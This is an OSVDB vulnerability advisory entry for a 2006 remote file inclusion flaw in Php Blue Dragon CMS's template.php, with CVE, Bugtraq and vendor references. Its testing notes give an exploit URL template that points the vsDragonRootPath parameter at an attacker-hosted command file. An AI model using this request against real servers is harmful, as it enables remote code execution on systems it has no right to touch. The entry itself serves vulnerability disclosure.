Php Blue Dragon CMS template.php vsDragonRootPath Variable Remote File Inclusion

2006-06-14T19:19:02
ID OSVDB:27473
Type osvdb
Reporter OSVDB
Modified 2006-06-14T19:19:02

Description

Manual Testing Notes

http://[target]/[pbd_path]/software_upload/public_includes/pub_templates/vphptree/template.php?vsDragonRootPath=[cmd_url]/

References:

Vendor URL: http://phpbluedragon.net/ Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0278.html CVE-2006-3076 Bugtraq ID: 18440